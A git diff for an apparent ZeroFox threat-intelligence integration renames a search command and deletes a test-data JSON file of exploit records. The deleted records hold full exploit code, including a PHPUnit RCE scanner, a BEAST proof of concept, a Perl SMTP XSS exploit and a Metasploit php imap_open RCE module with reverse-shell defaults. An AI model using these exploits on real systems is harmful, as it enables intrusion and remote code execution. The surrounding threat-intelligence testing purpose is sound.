diff --git a/Packs/ZeroFox/Integrations/ZeroFox/README.md b/Packs/ZeroFox/Integrations/ZeroFox/README.md index b2e86d113d54..5e5587e4226f 100644 --- a/Packs/ZeroFox/Integrations/ZeroFox/README.md +++ b/Packs/ZeroFox/Integrations/ZeroFox/README.md @@ -598,14 +598,14 @@ Looks for registered hashes in ZeroFox's CTI feeds | ZeroFox.MaliciousHashes.SHA512 | string | Hash in SHA512 format | | ZeroFox.MaliciousHashes.FoundHash | string | Indicates in which hash format was found the search | -### zerofox-search-exploit +### zerofox-search-exploits *** Looks for registered exploits in ZeroFox's CTI feeds #### Base Command -`zerofox-search-exploit` +`zerofox-search-exploits` #### Input diff --git a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json b/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json deleted file mode 100644 index abdfd6c4f5fe..000000000000 --- a/Packs/ZeroFox/Integrations/ZeroFox/TestData/cti/exploits.json +++ /dev/null @@ -1,87 +0,0 @@ -{ - "next": "https://api.zerofox.com/cti/exploits/?cursor=c2E9MTYyNzU2ODM2ODAwMCZzYT0zMQ%3D%3D&since=2023-06-27T00%3A00%3A00Z", - "results": [ - { - "created_at": "2021-07-26T09:40:37Z", - "cve": "CVE-2017-9841", - "urls": [ - "https://github.com/ludy-dev/PHPUnit_eval-stdin_RCE/blob/master/PHPUnit_eval-stdin_RCE.py" - ], - "exploit": "import re\nimport requests\nimport sys\nimport os\nimport base64\n\ndef exploit(dst_addr):\n\tlist = {\"/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/vendor/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/phpunit/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/src/Util/PHP/eval-stdin.php\"\n ,\"/lib/phpunit/Util/PHP/eval-stdin.php\"}\n\t\n\tprint(dst_addr)\n\tfor i in list:\n\t\t\n\t\tURL=\"http://\"+dst_addr+i\n\t\tprint(URL)\n\t\tdata = \"\"\n\t\tres = requests.post(URL, data=data, verify=False)\n\t\tresponse = res.text\n\t\t\n \t\tp = re.compile('c0eb89e1d7f2982390f96603e66f2b6b') # md5(Apri1) = c0eb89e1d7f2982390f96603e66f2b6b\n\t\tm = p.match(response)\n\t\tprint(\"Status Code : %d\"% res.status_code)\n\t\tif m:\n\t\t\t\tprint(\"Vuln Found\")\n\t\telse:\n\t\t\t\tprint(\"Not Found\")\n\n\nif __name__ == \"__main__\":\n\tif len(sys.argv) == 2:\n\t\t sys.argv.append('80')\n\telif len(sys.argv) < 3:\n\t\t\tprint ('Usage: python %s ' % os.path.basename(sys.argv[0]))\n\t\t\tsys.exit()\t\n\taddress =(sys.argv[1], sys.argv[2])\n\tdst_addr=\":\".join(address)\n\texploit(dst_addr)" - }, - { - "created_at": "2021-07-26T10:50:22Z", - "cve": "CVE-2011-3389", - "urls": [ - "https://github.com/mpgn/BEAST-PoC" - ], - "exploit": "#!/usr/bin/env python\n# -*- coding: utf-8 -*-\n\n'''\n BEAST attack - PoC\n Implementation of the cryptographic path behind the attack\n Author: mpgn \n'''\n\nimport random\nimport binascii\nimport sys\nfrom Crypto.Cipher import AES\nfrom Crypto import Random\n\n\"\"\"\n AES-CBC\n function encrypt, decrypt, pad, unpad\n You can fix the IV in the function encrypt() because TLS 1.0 fix the IV\n for the second, third... request (to gain time)\n\"\"\"\n\ndef pad(s):\n return s + (16 - len(s) % 16) * chr(16 - len(s) % 16)\n\ndef unpad(s):\n return s[:-ord(s[len(s)-1:])]\n\n# we admit the handshake produce a secret key for the session\n# of course we do not have any HMAC etc .. but there are not usefull in this attack\ndef encrypt( msg, iv_p=0):\n raw = pad(msg)\n if iv_p == 0:\n iv = Random.new().read( AES.block_size )\n else:\n iv = iv_p\n global key\n key = Random.new().read( AES.block_size )\n cipher = AES.new('V38lKILOJmtpQMHp', AES.MODE_CBC, iv )\n return cipher.encrypt( raw )\n\n\"\"\"\n The PoC of BEAST attack -\n Implementation of the cryptographic path behind the attack\n - the attacker can retrieve the request send be the client \n - but also make the client send requests with the plain text of his choice\n\"\"\"\n\ndef xor_strings(xs, ys, zs):\n return \"\".join(chr(ord(x) ^ ord(y) ^ ord(z)) for x, y, z in zip(xs, ys, zs))\n\ndef xor_block(vector_init, previous_cipher,p_guess):\n xored = xor_strings(vector_init, previous_cipher, p_guess)\n return xored\n\ndef split_len(seq, length):\n return [seq[i:i+length] for i in range(0, len(seq), length)]\n\n# the PoC start here, two method, one with two request\n# the other with two request\ndef run_two_request(find_me):\n print \"Start decrypting the request block 0 --> block 0\\n\"\n \n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n\n # add_byte will be decrement every byte deciphered\n add_byte = 16\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n \n # good pad\n if (add_byte+padding) < 0:\n s = find_me[-1*(add_byte+padding):]\n else:\n s = find_me\n\n # the client send the encrypted request with socket and TLS1.0\n # you intercept the request and now you have: enc\n enc = encrypt(\"a\"*(add_byte+padding) + s)\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(enc[0:length_block])\n p_guess = i_know + chr(i)\n \n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[1], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[1]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n add_byte = add_byte - 1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n# the PoC start here \ndef run_three_request(find_me):\n print \"Start decrypting the request using block 0 --> block 1\\n\"\n\n secret = []\n\n # the part of the request the atacker know, can be null\n i_know = \"flag: \"\n\n # padding is the length we need to add to i_know to create a length of 15 bytes\n padding = 16 - len(i_know) - 1\n i_know = \"a\"*padding + i_know\n length_block = 16\n t = 0\n\n # retrieve all the request\n while(t < (len(find_me)-len(\"flag: \"))):\n for i in range(0,256):\n # good pad\n if padding < 0:\n s = find_me[-1*(padding):]\n else:\n s = find_me\n \n # the first request is send\n first_r = encrypt(\"a\"*(padding) + s)\n # the second request is send\n enc = encrypt(\"a\"*(padding) + s, first_r[-length_block:])\n\n # get the value of the request ciphered\n original = split_len(binascii.hexlify(enc), 32)\n\n # GUESS XOR VI XOR C_I_1 build by the attacker\n vector_init = str(enc[-length_block:])\n previous_cipher = str(first_r[-length_block:])\n p_guess = i_know + chr(i)\n\n xored = xor_block( vector_init, previous_cipher, p_guess)\n\n # with some javascript injection, you force the client to send the\n # request of your choice, the TLS1.0 fix the IV to the last block of the previous request\n # with a MiTM you intercept the result and get\n enc = encrypt(xored, vector_init)\n\n result = split_len(binascii.hexlify(enc), 32)\n\n sys.stdout.write(\"\\r%s -> %s \" % (original[0], result[0]))\n sys.stdout.flush()\n\n # if the result request contains the same cipher block from the original request -> OK\n if result[0] == original[0]:\n print \" Find char \" + chr(i)\n i_know = p_guess[1:]\n padding = padding -1\n secret.append(chr(i))\n t = t + 1\n break\n elif i == 255:\n print \"Unable to find the char...\"\n return secret\n return secret\n\n\n# the attacker don't know the flag\nsecret = run_three_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n# or\n# secret = run_two_request(\"flag: WIN{TLS_1.0_Not_SO_Good_With_Socket}\")\n\nfound = ''.join(secret)\nprint \"\\n\" + found" - }, - { - "created_at": "2021-07-26T12:19:18Z", - "cve": "CVE-2005-2857", - "urls": [ - "https://www.exploit-db.com/exploits/1193" - ], - "exploit": "#!usr/bin/perl\n#\n# FREE SMTP Spam Filter Exploit\n# ------------------------------------\n# Infam0us Gr0up - Securiti Research\n#\n# Info: infamous.2hell.com\n# Vendor URL: http://www.softstack.com/\n# \n\nuse IO::Socket;\nuse Socket;\n\nprint(\"\\n FREE SMTP Spam Filter Exploit\\n\");\nprint(\" ---------------------------------\\n\\n\");\n\n# Changes to own feed \n$helo = \"mail.test\"; # HELO\n$mfrom = \"[support@vuln.test]\"; # MAIL FROM\n$rcpto = \"[root@localhost]\"; # RCPT TO\n$date = \"11 Feb 2099 12:07:10\"; # Date\n$from = \"Micro SEX's\"; # From mailer\n$subject = \"Check the new version.. ®®®\\n\".\n\"[b]VICKY VETTE[/b][i]is HOT Editon.Check it OUT!!. Free Nude Shop. Sex,video,picture,toys and XXX Chat Adults live!!![/i]\".\n\"[br][a href=http://127.0.0.1 onMouseOver=alert(document.cookie);]Click Here[/a]\"; # subject spammmer\n\nif($#ARGV < 0 | $#ARGV > 1) { \ndie \"usage: perl $0 [IP/host] \\nExam: perl $0 127.0.0.1 \\n\" };\n\n$adr = $ARGV[0];\n$prt = \"25\";\n\n# Don't changes this one\n$act1 = \"\\x48\\x45\\x4c\\x4f $helo\";\n$act2 = \"\\x4d\\x41\\x49\\x4c \\x46\\x52\\x4f\\x4d\\x3a$mfrom\";\n$act3 = \"\\x52\\x43\\x50\\x54 f\\x54\\x4f\\x3a$rcpto\";\n$act4 = \"\\x44\\x41\\x54\\x41\";\n$act5 = \"\\x44\\x61\\x74\\x65\\x3a $date\";\n\n$sub = \n\"\\x46\\x72\\x6f\\x6d\\x3a $from\".\n\"\\x53\\x75\\x62\\x6a\\x65\\x63\\x74\\x3a $subject\\x2e\".\n\"\\x51\\x55\\x49\\x54\";\n\nprint \"[+] Connect to $adr..\\n\";\n$remote = IO::Socket::INET->new(Proto=>\"tcp\", PeerAddr=>$adr,\nPeerPort=>$prt, Reuse=>1) or die \"[-] Error: can't connect to $adr:$prt\\n\";\nprint \"[+] Connected!\\n\";\n$remote->autoflush(1);\nprint \"[*] Send HELO..\";\nprint $remote \"$act1\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send MAIL FROM..\";\nprint $remote \"$act2\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send RCPT TO..\";\nprint $remote \"$act3\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATA..\";\nprint $remote \"$act4\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send DATE..\";\nprint $remote \"$act5\" or die \"\\n[-] Error: can't send xploit code\\n\";\nsleep(1);\nprint \"[OK]\\n\";\nprint \"[*] Send Sub Mail..\";\nprint $remote \"$sub\" or die \"\\n[-] Error: can't send xploit code\\n\";\nprint \"[OK]\\n\";\nprint \"[*] QUIT..\\n\";\nprint \"[+] MAIL SPAMWNED!\\n\\n\";\nclose $remote;\nprint \"press any key to exit..\\n\";\n$bla= [STDIN];\n\n# milw0rm.com [2005-09-02]" - }, - { - "created_at": "2021-07-26T12:35:48Z", - "cve": "CVE-2018-19518", - "urls": [ - "https://github.com/rapid7/metasploit-framework/blob/04e8752b9b74cbaad7cb0ea6129c90e3172580a2/modules/exploits/linux/http/php_imap_open_rce.rb" - ], - "exploit": "##\n# This module requires Metasploit: https://metasploit.com/download\n# Current source: https://github.com/rapid7/metasploit-framework\n##\n\nclass MetasploitModule < Msf::Exploit::Remote\n Rank = GoodRanking\n\n include Msf::Exploit::Remote::HttpClient\n\n def initialize(info = {})\n super(update_info(info,\n 'Name' => 'php imap_open Remote Code Execution',\n 'Description' => %q{\n The imap_open function within php, if called without the /norsh flag, will attempt to preauthenticate an\n IMAP session. On Debian based systems, including Ubuntu, rsh is mapped to the ssh binary. Ssh's ProxyCommand\n option can be passed from imap_open to execute arbitrary commands.\n While many custom applications may use imap_open, this exploit works against the following applications:\n e107 v2, prestashop, SuiteCRM, as well as Custom, which simply prints the exploit strings for use.\n Prestashop exploitation requires the admin URI, and administrator credentials.\n suiteCRM/e107 require administrator credentials. Fixed in php 5.6.39.\n },\n 'Author' =>\n [\n 'Anton Lopanitsyn', # Vulnerability discovery and PoC\n 'Twoster', # Vulnerability discovery and PoC\n 'h00die', # Metasploit Module\n 'Paolo Serracino', # Horde IMP EDB\n 'Pietro Minniti', # Horde IMP EDB\n 'Damiano Proietti' # Horde IMP EDB\n ],\n 'License' => MSF_LICENSE,\n 'References' =>\n [\n [ 'URL', 'https://web.archive.org/web/20181118213536/https://antichat.com/threads/463395' ],\n [ 'URL', 'https://github.com/Bo0oM/PHP_imap_open_exploit' ],\n [ 'EDB', '45865'],\n # This claims all versions of Horde IMP are vuln, but only H3 (~2012) and possibly older are vuln.\n [ 'EDB', '46136'],\n [ 'URL', 'https://bugs.php.net/bug.php?id=76428'],\n [ 'CVE', '2018-19518'],\n [ 'CVE', '2018-1000859']\n ],\n 'Privileged' => false,\n 'Platform' => [ 'unix' ],\n 'Arch' => ARCH_CMD,\n 'Targets' =>\n [\n [ 'prestashop', {} ],\n [ 'suitecrm', {}],\n [ 'e107v2', {'WfsDelay' => 90}], # may need to wait for cron\n [ 'Horde IMP H3', {}],\n [ 'custom', {'WfsDelay' => 300}]\n ],\n 'PrependFork' => true,\n 'DefaultOptions' =>\n {\n 'PAYLOAD' => 'cmd/unix/reverse_netcat',\n 'WfsDelay' => 120\n },\n 'DefaultTarget' => 0,\n 'DisclosureDate' => '2018-10-23'))\n\n register_options(\n [\n OptString.new('TARGETURI', [ true, \"Base directory path\", '/admin2769gx8k3']),\n OptString.new('USERNAME', [ false, \"Username to authenticate with\", '']),\n OptString.new('PASSWORD', [ false, \"Password to authenticate with\", ''])\n ])\n end\n\n def check\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && (res.code == 301 || res.code == 302)\n return CheckCode::Detected\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n return CheckCode::Detected\n end\n elsif target.name =~ /Horde IMP H3/\n res = send_request_cgi({'uri' => normalize_uri(target_uri.path, 'imp', 'test.php')})\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n major, minor = res.body.scan(/PHP Major Version: (?5\\.[1-6]{1})<\/li>\\s+
  • PHP Minor Version: (?[\\d]?\\d)/).flatten\n phpversion = \"#{major}.#{minor}\"\n if res.code == 200 && res.body =~ /PHP Mail Server Support Test/ && phpversion != '.'\n if Rex::Version.new(phpversion) < Rex::Version.new('5.6.39')\n vprint_good(\"PHP Version #{phpversion} is vulnerable\")\n return CheckCode::Appears\n else\n vprint_bad(\"PHP Version #{phpversion} is NOT vulnerable, patched in 5.6.39.\")\n end\n end\n end\n CheckCode::Safe\n end\n\n def command(spaces='$IFS$()')\n #payload is base64 encoded, and stuffed into the SSH option.\n enc_payload = Rex::Text.encode_base64(payload.encoded)\n command = \"-oProxyCommand=`echo #{enc_payload}|base64 -d|bash`\"\n #final payload can not contain spaces, however $IFS$() will return the space we require\n command.gsub!(' ', spaces)\n end\n\n def exploit\n if target.name =~ /prestashop/\n uri = normalize_uri(target_uri.path)\n res = send_request_cgi({'uri' => uri})\n if res && res.code != 301\n print_error('Admin redirect not found, check URI. Should be something similar to /admin2769gx8k3')\n return\n end\n\n #There are a bunch of redirects that happen, so we automate going through them to get to the login page.\n while res.code == 301 || res.code == 302\n cookie = res.get_cookies\n uri = res.headers['Location']\n vprint_status(\"Redirected to #{uri}\")\n res = send_request_cgi({'uri' => uri})\n end\n\n #Tokens are generated for each URL or sub-component, we need valid ones!\n /.*token=(?\\w{32})/ =~ uri\n /id=\"redirect\" value=\"(?.*)\"\/>/ =~ res.body\n cookie = res.get_cookies\n\n unless token && redirect\n print_error('Unable to find token and redirect URL, check options.')\n return\n end\n\n vprint_status(\"Token: #{token} and Login Redirect: #{redirect}\")\n print_status(\"Logging in with #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'ajax' => 1,\n 'token' => '',\n 'controller' => 'AdminLogin',\n 'submitLogin' => '1',\n 'passwd' => datastore['PASSWORD'],\n 'email' => datastore['USERNAME'],\n 'redirect' => redirect\n },\n 'vars_get' => {\n 'rand' => '1542582364810' #not sure if this will hold true forever, I didn't see where it is being generated\n }\n )\n if res && res.body.include?('Invalid password')\n print_error('Invalid Login')\n return\n end\n vprint_status(\"Login JSON Response: #{res.body}\")\n uri = JSON.parse(res.body)['redirect']\n cookie = res.get_cookies\n print_good('Login Success, loading admin dashboard to pull tokens')\n res = send_request_cgi({'uri' => uri, 'cookie' => cookie})\n\n /AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n vprint_status(\"Customer Threads Token: #{token}\")\n res = send_request_cgi({\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n })\n\n /form method=\"post\" action=\"index\\.php\\?controller=AdminCustomerThreads&token=(?\\w{32})/ =~ res.body\n print_good(\"Sending Payload with Final Token: #{token}\")\n data = Rex::MIME::Message.new\n data.add_part('1', nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_FILE_UPLOAD\"')\n data.add_part(\"Dear Customer,\\n\\nRegards,\\nCustomer service\", nil, nil, 'form-data; name=\"PS_CUSTOMER_SERVICE_SIGNATURE_1\"')\n data.add_part(\"x #{command}}\", nil, nil, 'form-data; name=\"PS_SAV_IMAP_URL\"')\n data.add_part('143', nil, nil, 'form-data; name=\"PS_SAV_IMAP_PORT\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_USER\"')\n data.add_part(Rex::Text.rand_text_alphanumeric(8), nil, nil, 'form-data; name=\"PS_SAV_IMAP_PWD\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_DELETE_MSG\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_CREATE_THREADS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_POP3\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NORSH\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_SSL\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_VALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOVALIDATE-CERT\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_TLS\"')\n data.add_part('0', nil, nil, 'form-data; name=\"PS_SAV_IMAP_OPT_NOTLS\"')\n data.add_part('', nil, nil, 'form-data; name=\"submitOptionscustomer_thread\"')\n\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'ctype' => \"multipart/form-data; boundary=#{data.bound}\",\n 'data' => data.to_s,\n 'cookie' => cookie,\n 'vars_get' => {\n 'controller' => 'AdminCustomerThreads',\n 'token' => token\n }\n )\n print_status('IMAP server change left on server, manual revert required.')\n\n if res && res.body.include?('imap Is Not Installed On This Server')\n print_error('PHP IMAP mod not installed/enabled ')\n end\n elsif target.name =~ /suitecrm/\n #login page GET /index.php?action=Login&module=Users\n vprint_status('Loading login page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'vars_get' => {\n 'action' => 'Login',\n 'module' => 'Users'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 200\n cookie = res.get_cookies\n else\n print_error(\"HTTP code #{res.code} found, check options.\")\n return\n end\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'module' => 'Users',\n 'action' => 'Authenticate',\n 'return_module' => 'Users',\n 'return_action' => 'Login',\n 'cant_login' => '',\n 'login_module' => '',\n 'login_action' => '',\n 'login_record' => '',\n 'login_token' => '',\n 'login_oauth_token' => '',\n 'login_mobile' => '',\n 'user_name' => datastore['USERNAME'],\n 'username_password' => datastore['PASSWORD'],\n 'Login' => 'Log+In'\n }\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code = 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n #load the email settings page to get the group_id\n vprint_status('Loading InboundEmail page')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'module' => 'InboundEmail',\n 'action' => 'EditView'\n }\n )\n\n unless res\n print_error('Error loading site.')\n return\n end\n\n /\"group_id\" value=\"(?\\w{8}-\\w{4}-\\w{4}-\\w{4}-\\w{12})\">/ =~ res.body\n\n unless group_id\n print_error('Could not identify group_id from form page')\n return\n end\n\n print_good(\"Sending payload with group_id #{group_id}\")\n\n referer = \"http://#{datastore['RHOST']}#{normalize_uri(target_uri.path, 'index.php')}?module=InboundEmail&action=EditView\"\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'index.php'),\n 'cookie' => cookie,\n #required to prevent CSRF protection from triggering\n 'headers' => { 'Referer' => referer},\n 'vars_post' => {\n 'module' => 'InboundEmail',\n 'record' => '',\n 'origin_id' => '',\n 'isDuplicate' => 'false',\n 'action' => 'Save',\n 'group_id' => group_id,\n 'return_module' => '',\n 'return_action' => '',\n 'return_id' => '',\n 'personal' => '',\n 'searchField' => '',\n 'mailbox_type' => '',\n 'button' => ' Save ',\n 'name' => Rex::Text.rand_text_alphanumeric(8),\n 'status' => 'Active',\n 'server_url' => \"x #{command}}\",\n 'email_user' => Rex::Text.rand_text_alphanumeric(8),\n 'protocol' => 'imap',\n 'email_password' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'mailbox' => 'INBOX',\n 'trashFolder' => 'TRASH',\n 'sentFolder' => '',\n 'from_name' => Rex::Text.rand_text_alphanumeric(8),\n 'is_auto_import' => 'on',\n 'from_addr' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'reply_to_name' => '',\n 'distrib_method' => 'AOPDefault',\n 'distribution_user_name' => '',\n 'distribution_user_id' => '',\n 'distribution_options[0]' => 'all',\n 'distribution_options[1]' => '',\n 'distribution_options[2]' => '',\n 'create_case_template_id' => '',\n 'reply_to_addr' => '',\n 'template_id' => '',\n 'filter_domain' => '',\n 'email_num_autoreplies_24_hours' => '10',\n 'leaveMessagesOnMailServer' => '1'\n }\n )\n if res && res.code == 200\n print_error('Triggered CSRF protection, may try exploitation manually.')\n end\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /Horde IMP H3/\n # The original EDB module claims \"Version: All IMP versions\", however the current\n # major branch https://github.com/horde/imp/tree/74e3f5fdbac31dfcff15195832c1b9b888767982\n # does not include any reference to imap_open, nor 'test.php' in the root directory.\n # H5 (current) uses the IMP test url: /horde/test.php?app=imp with \"Mail Server Support Test\"\n # as the header:\n # https://github.com/horde/imp/blob/16400fd5f52610d27d59d21fe2e39db2c85837f1/lib/Test.php#L85\n # H3 (~2012) uses the IMP test url: /horde/imp/test.php and \"PHP Mail Server Support Test\"\n # which are the values coded into the python edb exploit.\n print_status(\"Sending Exploit Request\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'imp', 'test.php'),\n 'vars_post' => {\n 'f_submit' => 'Submit',\n 'passwd' => Rex::Text.rand_text_alphanumeric(8),\n 'port' => '143',\n 'server' => \"x #{command}}\",\n 'server_type' => 'imap',\n 'user' => Rex::Text.rand_text_alphanumeric(8)\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n elsif target.name =~ /e107v2/\n # e107 has an encoder which prevents $IFS$() from being used as $ = $\n # \\t also became /t, however \"\\t\" does seem to work.\n\n # e107 also uses a cron job to check bounce jobs, which may not be active.\n # either cron can be disabled, or bounce checks disabled, so we try to\n # kick the process manually, however if it doesn't work we'll hope\n # cron is running and we get a call back anyways.\n\n vprint_status(\"Logging in as #{datastore['USERNAME']}:#{datastore['PASSWORD']}\")\n res = send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'admin.php'),\n 'vars_post' => {\n 'authname' => datastore['USERNAME'],\n 'authpass' => datastore['PASSWORD'],\n 'authsubmit' => 'Log In'\n })\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if res.code == 302\n cookie = res.get_cookies\n print_good('Login Success')\n else\n print_error('Failed Login, check options.')\n end\n\n vprint_status('Checking if Cron is enabled for triggering')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n if res.body.include? 'Status: Disabled'\n print_error('Cron disabled, unexploitable.')\n return\n end\n\n print_good('Storing payload in mail settings')\n\n # the imap/pop field is hard to find. Check Users > Mail\n # then check \"Bounced emails - Processing method\" and set it to \"Mail account\"\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'mailout.php'),\n 'cookie' => cookie,\n 'vars_get' => {\n 'mode' => 'prefs',\n 'action' => 'prefs'\n },\n 'vars_post' => {\n 'testaddress' => 'none@none.com',\n 'testtemplate' => 'textonly',\n 'bulkmailer' => 'smtp',\n 'smtp_server' => '1.1.1.1',\n 'smtp_username' => 'username',\n 'smtp_password' => 'password',\n 'smtp_port' => '25',\n 'smtp_options' => '',\n 'smtp_keepalive' => '0',\n 'smtp_useVERP' => '0',\n 'mail_sendstyle' => 'texthtml',\n 'mail_pause' => '3',\n 'mail_pausetime' => '4',\n 'mail_workpertick' => '5',\n 'mail_log_option' => '0',\n 'mail_bounce' => 'mail',\n 'mail_bounce_email2' => '',\n 'mail_bounce_email' => \"#{Rex::Text.rand_text_alphanumeric(8)}@#{Rex::Text.rand_text_alphanumeric(8)}.org\",\n 'mail_bounce_pop3' => \"x #{command(\"\\t\")}}\",\n 'mail_bounce_user' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_pass' => Rex::Text.rand_text_alphanumeric(8),\n 'mail_bounce_type' => 'imap',\n 'mail_bounce_auto' => '1',\n 'updateprefs' => 'Save Changes'\n })\n\n\n vprint_status('Loading cron page to execute job manually')\n res = send_request_cgi(\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie\n )\n\n unless res\n print_error('Error loading site. Check options.')\n return\n end\n\n if /name='e-token' value='(?\\w{32})'/ =~ res.body && /_system::procEmailBounce.+?cron_execute\\[(?\\d)\\]/m =~ res.body\n print_good(\"Triggering manual run of mail bounch check cron to execute payload with cron id #{cron_id} and etoken #{etoken}\")\n # The post request has several duplicate columns, however all were not required. Left them commented for documentation purposes\n send_request_cgi(\n 'method' => 'POST',\n 'uri' => normalize_uri(target_uri.path, 'e107_admin', 'cron.php'),\n 'cookie' => cookie,\n 'vars_post' => {\n 'e-token' => etoken,\n #'e-columns[]' => 'cron_category',\n 'e-columns[]' => 'cron_name',\n #'e-columns[]' => 'cron_description',\n #'e-columns[]' => 'cron_function',\n #'e-columns[]' => 'cron_tab',\n #'e-columns[]' => 'cron_lastrun',\n #'e-columns[]' => 'cron_active',\n \"cron_execute[#{cron_id}]\" => '1',\n 'etrigger_batch' => ''\n })\n\n else\n print_error('e-token not found, required for manual exploitation. Wait 60sec, cron may still trigger.')\n end\n\n print_status('IMAP server config left on server, manual removal required.')\n elsif target.name =~ /custom/\n print_status('Listener started for 300 seconds')\n print_good(\"POST request connection string: x #{command}}\")\n # URI.encode leaves + as + since that's a space encoded. So we manually change it.\n print_good(\"GET request connection string: #{URI.encode(\"x \" + command + \"}\").sub! '+', '%2B'}\")\n end\n end\nend" - }, - { - "created_at": "2021-07-26T14:12:26Z", - "cve": "CVE-2019-10866", - "urls": [ - "https://github.com/sepehrdaddev/0day-today-exploits/blob/4c60d5a5b65e42e6f67512596926f261fa10b668/32829.txt" - ], - "exploit": "# Exploit Title: WordPress Plugin Form Maker 1.13.3 - SQL Injection\n# Exploit Author: Daniele Scanu @ Certimeter Group\n# Vendor Homepage: https://10web.io/plugins/\n# Version: 